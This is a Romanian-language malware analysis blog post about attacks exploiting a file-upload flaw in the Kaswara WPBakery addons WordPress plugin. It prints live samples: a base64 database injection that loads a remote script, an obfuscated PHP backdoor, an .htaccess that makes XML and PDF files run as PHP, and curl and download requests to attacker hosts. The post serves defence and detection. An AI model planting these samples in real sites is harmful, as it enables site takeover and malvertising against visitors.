Vulnerabil Kaswara Modern WPBakery Page Builder Addons Plugin este exploatat în sălbăticie

În data de 20 aprilie 2021, prietenii noștri de la WPScan au raportat o vulnerabilitate gravă în Kaswara Modern VC Addons, cunoscut și sub numele de Kaswara Modern WPBakery Page Builder Addons. Nu mai este disponibil la Codecanyon/Envato, ceea ce înseamnă că dacă aveți acest lucru în funcțiune, trebuie să alegeți o alternativă.

Această vulnerabilitate permite utilizatorilor neautentificați să încarce fișiere arbitrare în directorul de pictograme al pluginului (./wp-content/uploads/kaswara/icons). Acesta este primul indicator de compromis (IOC) pe care prietenii noștri de la WPScan ni l-au împărtășit în raportul lor.

Capacitatea de a încărca fișiere arbitrare pe un site web îi oferă actorului rău control total asupra site-ului, ceea ce face dificilă definirea sarcinii finale a acestei infecții; astfel, vă vom arăta tot ce am găsit până acum (ne-am lăsat puțin duși de cercetare, așa că nu ezitați să treceți la secțiunea IOC dacă nu doriți să citiți).

Injecție de baze de date, aplicații Android false și alte uși din spate

Mulțumim prietenului nostru Denis Sinegubko de la Sucuri pentru că a subliniat urmărirea injecției în baza de date folosită cu acest atac.

Actorii răi ar actualiza opțiunea „kaswara-customJS” pentru a adăuga un fragment arbitrar rău intenționat de cod Javascript. Iată un exemplu pe care l-am găsit:

INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES (1856,'kaswara-customJS',
'dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoXCdzY3JpcHRcJyk7CnNjcmlwdC5vbmxvYWQgPSBm
dW5jdGlvbigpIHsKfTsKc2NyaXB0LnNyYyA9IFwiaHR0cHM6Ly9ldmFkYXYubGluay9zY3JpcHQuanNcIjsKZG9jdW1lbnQu
Z2V0RWxlbWVudHNCeVRhZ05hbWUoXCdoZWFkXCcpWzBdLmFwcGVuZENoaWxkKHNjcmlwdCk7','yes');

Acest șir codificat în base64 se traduce prin:

var script = document.createElement(\'script\');
script.onload = function() {
};
script.src = \"hxxps://evadav[.]link/script.js\";
document.getElementsByTagName(\'head\')[0].appendChild(script);

Și, așa cum se întâmplă de obicei cu acest tip de script, acesta va încărca în lanț o serie de alte fragmente de cod Javascript, iar sarcina utilă finală va fi fie un malvertising, fie un kit de exploatare. Acest lucru este foarte asemănător cu ceea ce a raportat Wordfence aici.

În acest caz, scriptul moare pe hxxp://double-clickd[.]com/ și nu încarcă niciun conținut rău. Am găsit Javascript suspect care apelează acest site de la începutul anului 2020 și oamenii îl blochează deja din 2018.

Aplicații false încărcate pe site

Cele 40 de aplicații Android găsite pe site-urile web pe care le-am examinat erau versiuni false ale diferitelor aplicații, cum ar fi AliPay, PayPal, Correos, DHL și multe altele, care, din fericire, au fost detectate de cei mai populari furnizori de anti-virus conform acestei analize VirusTotal.

Nu am verificat intențiile aplicației, dar o analiză rapidă a permisiunilor pe care le solicită ne poate oferi o privire asupra a ceea ce ar putea face:

• android.permission.WRITE_SMS
• android.permission.RECEIVE_SMS
• android.permission.FOREGROUND_SERVICE
• android.permission.KILL_BACKGROUND_PROCESSES
• android.permission.READ_CONTACTS
• android.permission.READ_PHONE_STATE
• android.permission.READ_SMS
• android.permission.ACCESS_NETWORK_STATE
• android.permission.QUERY_ALL_PACKAGES
• android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
• android.permission.INTERNET
• android.permission.SEND_SMS
• android.permission.CALL_PHONE
• android.permission.WAKE_LOCK
• android.permission.REQUEST_DELETE_PACKAGES

Totuși, acele fișiere nu sunt încărcate imediat folosind exploit-ul Kaswara. După ce site-ul este compromis, atacatorii vor încărca mai întâi alte instrumente pentru a controla pe deplin site-ul.

Fișiere încărcate

Unele uși din spate și alte programe malware au fost găsite și pe site-uri web compromise de această vulnerabilitate. Voi împărtăși o analiză rapidă a celor mai populare și interesante în această postare. Cu toate acestea, vreau să mă concentrez mai întâi pe cel mai complex.

Redirecționare și aplicații false

Aplicațiile false pe care le-am găsit pe mai multe site-uri compromise nu au fost încărcate prin exploatarea vulnerabilității Kaswara. Acestea sunt încărcate pe site folosind un instrument de hack-tool multifuncțional, care permite atacatorului să încarce un cod de la distanță (prin furnizarea unui URL sau șir) și să redirecționeze utilizatorul către un site rău intenționat.

Fișierul poate fi ușor identificat prin prezența acestui șir: base64_decode('MTIz');error_reporting(0); funcţie

Destul de interesant, randomizează totul în afară de asta.

Malware-ul este pe o singură linie, ceea ce este și un IOC interesant dacă căutați acest tip de anomalie de cod.

Pentru a fi mai ușor de înțeles, am decodat majoritatea părților codului, am redenumit funcțiile interesante și am înfrumusețat codul. Malware-ul include 6 funcții diferite, iar 5 dintre ele se bazează pe valorile transmise variabilei $_GET['ts'] . Pentru acest document, să luăm în considerare una dintre numeroasele instanțe pe care le-am găsit: c.php .

/c.php?ts=kt

Acest lucru nu face nimic și va forța site-ul să returneze o eroare 500 (mai târziu în cod).

/c.php?ts=1

Schimbă valoarea flag $q1a la true pentru a efectua o validare a codului și a trimite un mesaj OK atacatorului.

În acest caz, site-ul de la distanță răspunde: {"body":"","headers":["Location: http:\/\/good-valid-1"],"status":302,"contentType":""}

/c.php?ts=sv&v=”Cod”&p=40bd001563085fc35165329ea1ff5c5ecbdbbeef

Scrie un fișier pe server cu codul furnizat de conținutul lui $_GET["v"] atâta timp cât $_GET["p"] este suma de control SHA1 de 123 (rețineți că primul IOC din base64_decode('MTIz') ? este suma de control).

/c.php?ts=tt

Scrie 5 MB de „-” pe server, probabil folosit pentru a testa dacă funcția de încărcare va funcționa pe server.

/c.php?ts=dwm&h=HASH1,HASH2

Când malware-ul primește această solicitare, efectuează un test pentru a verifica dacă fișierele încărcate au fost scrise cu succes pe server. Hashe-urile lor MD5 trebuie să fie cunoscute și sunt trimise la variabila $_GET['h'] ca valori separate prin virgulă.

/c.php?ts=dw&h=hash&l=URLs_as_CSV

Descarcă un fișier de pe o serie de site-uri web ale terților și îl salvează pe server denumindu-l după ultimele 12 caractere ale md5 ale fișierului descărcat.

Aceasta este funcția folosită pentru a încărca aplicații false pe server.

Iată un exemplu de solicitare de descărcare a fișierelor rău intenționate /c.php?ts=dw&h=7e7bcc10406f3787b0a08d4199e6a697&l=http%3A%2F%2Fsmurfetta.ru%2Fhash-de%2F%3Fh%3D7e7bcc10406f3787b0a08d4199e6a697

Redirecționarea accesului

Dacă opțiunea kt sau nicio opțiune a fost selectată, codul trece la redirecționare, care se realizează prin solicitarea unui blob JSON cu datele necesare. Apoi, redirecționează vizitatorul folosind funcția antet.

Răspunsul este astfel: {"body":"","headers":["Location: https:\/\/stunningawards.life\/?u=yuek60p&o=2k5p1e0&m=1"],"status":302,"contentType":""}

Funcția pentru a executa o solicitare cURL cu parametrii necesari este aceasta: Nimic de lux...

Și poate fi tradus în această solicitare cURL:

curl -X POST hxxp://papass[.]ru/click_api/v3 \
    -H 'X-Forwarded-For: 200.171.221.1' \
    -H 'Accept-Language: *' \
    -H 'User-Agent: Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G975F) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/14.0 Chrome/87.0.4280.141 Mobile Safari/537.36' \
    -d 'token=hmfovdqs9vfxp8s4rwqzxbfz6c43bwgb&force_redirect_offer=1&sub_id_1=dbhomeworkout.com&sub_id_2=dbhomeworkout.com&sub_id_3=dbhomeworkout.com&sub_id_4'

URL-ul final este, din câte am putut testa, aleatoriu, dar împărtășește aceeași caracteristică de a fi o pagină falsă pentru un serviciu sau o aplicație populară.

wp-content/uploads/kaswara/icons/16/javas.xml și wp-content/uploads/kaswara/icons/16/.htaccess

Un fișier XML nu este de obicei marcat ca o potențială amenințare, dar în acest caz, avem un fișier .htaccess special creat care schimbă modul în care îl vede serverul web:

Order Deny,Allow
Allow from all

<FilesMatch "_?(javas|homes|menus)\.(php|xml|pdf)\d*$">
    AddHandler application/x-httpd-php .xml .pdf
    AddType application/x-httpd-php .xml .pdf
    # ---
    SetHandler application/x-httpd-php
    ForceType application/x-httpd-php
    # ---
    php_value engine 1
    # ---
    Order Deny,Allow
    Allow from all
</FilesMatch>

De fapt, îi spune Apache să înțeleagă orice fișiere javas, home sau meniuri cu xml, php sau pdf ca fișier PHP care să fie procesat în consecință și executat. Deci, oricare dintre acele fișiere prezente în aceeași structură de directoare ca acest .htaccess va fi suspect.

Fișierul javas.xml este același cu alte fișiere rău intenționate încărcate pe site. Am descoperit că diferența este că unele au una sau două linii goale la sfârșitul fișierului, ceea ce face hashingul tradițional puțin mai complicat.

<?php
$LnWYZK 	  	="\163"."\164" 	 ."\162\137\162\157"	 	.	 	"\164"	. 		  (		 279	 	-  			266)	 	  ; 	 	 if( !empty		 	 (	$ { 	 $LnWYZK	   	
("\137"	.	"\103\102\106" 		 	.		 "\107")}	) 	 		)  			{  	 			 $nNZph 	 =$LnWYZK		 (	 		 "\172". 		"\161". 	(4334	 	
-4329	)		   	 	)			  ; $ouQLkV  	 	= $LnWYZK		 (	 	 	"\157\156"  	.  	"\146" .		 "\162"	.		  	 (	  9680	 	-	  9616)  	 . "\137" 		
. 		"\161"   		.   		"\162\160\142\161\162" 	 ) 		  ; 			  $VNfzSD  	 	=$LnWYZK("\160\145\162"."\156\147\162\137\163\150\141\160"	
. "\147\166\142\141" 			 ); 	  	foreach	($			  { 	 	 $LnWYZK(			  "\137".	 	"\103"  	.	  		"\102" . 			 "\106"	 	. 		"\107" 	 		
)  			}	  as	$IKRDzf   		=>	$NIvHUr	  )( 	  	$nNZph  			(	   	$IKRDzf  	)  	===	 	  		 "c"	  .  (2668 - 	  	2626	 		 )   			.   		
"\145\141"   		."\71"		   .  			"\67"	."\71\145\144"	 	.	  "\71\70\62"	.  	"\143\60" 	 . 	 	 	(314406	  -51163		 )	 	 	. "\60" 			 
.	"\145" 	 . 			 "\71" 	 .		   "\145" . "\71"	  		.	"\70"	  	 .			  "\141"	  		.	 	"\66" . 		"\66"	.	"\144"		  	.    		( 	  	9786	-		 	 
9780 		) 		  		 	&&  	$QZCMY	 		 =	 	  $VNfzSD( ""  			, 	 $ouQLkV (  	$NIvHUr)   		)  	) 		 		 	 	?$QZCMY 	 () : " 		"		  	
;  	}

Codul rău intenționat este ofuscat folosind șiruri de caractere codificate str_rot13 și base64. De asemenea, folosește valori hexazecimale și operații matematice pentru a ascunde puțin mai mult șirurile. Sarcina utilă finală este necunoscută, deoarece va crea o funcție bazată pe valorile unei solicitări POST. Cu toate acestea, sarcina utilă pare să fie aceeași de fiecare dată, deoarece se bazează pe o verificare md5 înainte de a o crea (c42ea979ed982c02632430e9e98a66d6 este hash-ul md5).

Concluzie

Deoarece aceasta este o campanie activă, la momentul scrierii acestei postări, găsim din ce în ce mai multe exemple diferite de malware care sunt aruncate pe site-urile afectate. Unele sunt doar variante ale ceea ce avem aici, în timp ce altele sunt suficient de interesante pentru o analiză mai profundă. Căutați câteva postări mai mici care vor veni în curând pentru a explora câteva dintre aceste alte exemple.

Aceasta ilustrează importanța actualizării extensiilor cu cele mai recente remedieri de securitate; dacă dezvoltatorii nu lansează remedieri în timp util sau este eliminat din depozitul WordPress.org (sau din alte piețe), vă recomandăm insistent să găsiți o alternativă mai sigură la aceasta.

Dacă sunteți îngrijorat de programele malware și de vulnerabilitatea site-ului dvs., verificați caracteristicile de securitate ale Jetpack. Jetpack Security oferă securitate cuprinzătoare și ușor de utilizat pentru site-ul WordPress, inclusiv copii de rezervă, scanare malware și protecție împotriva spamului.

Indicatori de compromis

Aici găsiți lista completă a tuturor IOC-urilor pe care le-am identificat: